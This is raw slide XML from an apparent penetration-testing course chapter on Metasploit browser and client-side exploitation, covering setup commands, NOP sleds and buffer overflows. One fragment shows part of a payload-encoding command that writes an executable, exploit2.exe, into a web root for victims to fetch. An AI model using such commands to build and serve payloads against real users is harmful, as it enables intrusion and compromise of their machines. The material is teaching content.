                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -e x86/countdown -c 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-t exe -o /var/www/exploit2.exe</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291620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F0AEE8-27D5-7A1C-77AE-D45E8D2DCA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="43934"/>
            <a:ext cx="3266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i="1" u="sng" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How To Open &amp; update MSF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1F3721-2B23-66F7-3752-E0640B5485F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="583531" y="1451629"/>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4DC8FC8-25B7-8FA0-744F-86B97618A953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="208529" y="1715251"/>
            <a:ext cx="11774941"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lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo apt update &amp;&amp; sudo apt upgrade –y</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lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo apt update ; apt install metasploit-framework                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( if uninstalled)</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sz="1400"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lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>udo msfupdate</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lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>udo m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sfconsole</a:t>
            </a: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lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092FD0D3-18AB-FCC7-C49C-BA29A20BDD6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1040731" y="1908829"/>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5271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973891" cy="954107"/>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effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client-Side Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1"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B324A515-ECBA-1830-4DA3-872B2391E223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1428750" y="734783"/>
            <a:ext cx="11013621" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>A client-side attack is a security breach that happens on the client side. Examples include installing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> on your device or banking credentials being stolen by third party sites. A common client-side attack is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>enial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>ervice (DOS) attacks. which floods a system with requests and prevents it from functioning properly</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1A9AB4F-2B77-7DD2-C1BB-D24E5A446653}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2020661" y="2223407"/>
            <a:ext cx="7905750" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1175778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5017720"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Digraph Of Clint Side Attacks Types </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E044B5BC-7C3E-EF2C-5508-9AF1CB93A45D}"/>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35924" y="1709737"/>
            <a:ext cx="8125282" cy="3438525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B6344D1-2791-2CBC-E2D8-DF1F824F5E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8261206" y="1516722"/>
            <a:ext cx="3824556" cy="3824556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3407258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2228786" y="0"/>
            <a:ext cx="8093883" cy="892552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>E X P L O I T A T I O N  C L I E N T  S I D E  A T T A C K S</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C7E54CC-209E-8752-16C0-5A6DE47121F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1311297" y="1482865"/>
            <a:ext cx="12169140" cy="877163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This chapter will concentrate on browser based Metasploit exploits. Because users in many organizations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spend more time using their web browsers than any other computer programs, browser based attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are some strategies. </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D0D5D38-0333-1079-8523-B94A49F913C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925592"/>
            <a:ext cx="3406702" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Browser-Based Exploits</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6785BB6-C92D-6717-33E9-F34133979EFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9909" y="2394081"/>
            <a:ext cx="3619902"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effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Explain NOPs     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OPeration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1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24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EF048-BF59-8458-17DF-69A1354E749C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647950" y="5051431"/>
            <a:ext cx="6896100" cy="17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5" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90FA68E1-53F3-CC71-64DD-22B5051EF254}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647950" y="5103674"/>
            <a:ext cx="6964680" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8190E6-C189-4720-F68C-FC9BD31E135F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964915" y="3877040"/>
            <a:ext cx="10789263" cy="1138773"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now that you are familiar with the fundamentals. a NOP let's examine a generic NOP slide in a real world attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Take note of the hexadecimal encoding of opcode x90 for the Intel x86 architecture in the following listing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In Intel x86 assembly, a 90 denotes a NOP. You can see a string of x90s in this image that produce our NO.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The payload which might be a reverse shell or a Meterpreter shell, makes up the remaining code. </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E91F6C08-DF20-EFEC-7BF9-451792C918C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440181" y="2777278"/>
            <a:ext cx="10789264" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is a sequence of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" tooltip="NOP (code)">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>NOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (no-operation) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>They are represented in the Intel x86 CPU family they are represented with 0x90, following which the CPU will do nothing for one cycle. They are often used as a buffer to achieve consistent payload sizes</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1010319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09396"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Buffer Overflow </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A picture containing shape">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76151175-F84A-E9D9-6FBA-B1245A72A555}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="135924" y="809081"/>
            <a:ext cx="6766796" cy="355256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6" name="Picture 5" descr="Chart&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DD0B10D-058B-D05B-274E-8DAADC3389CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9613448" y="1151179"/>
            <a:ext cx="2331417" cy="42160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Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A22DA28B-8378-39CC-2BF2-F08ABA6FB861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
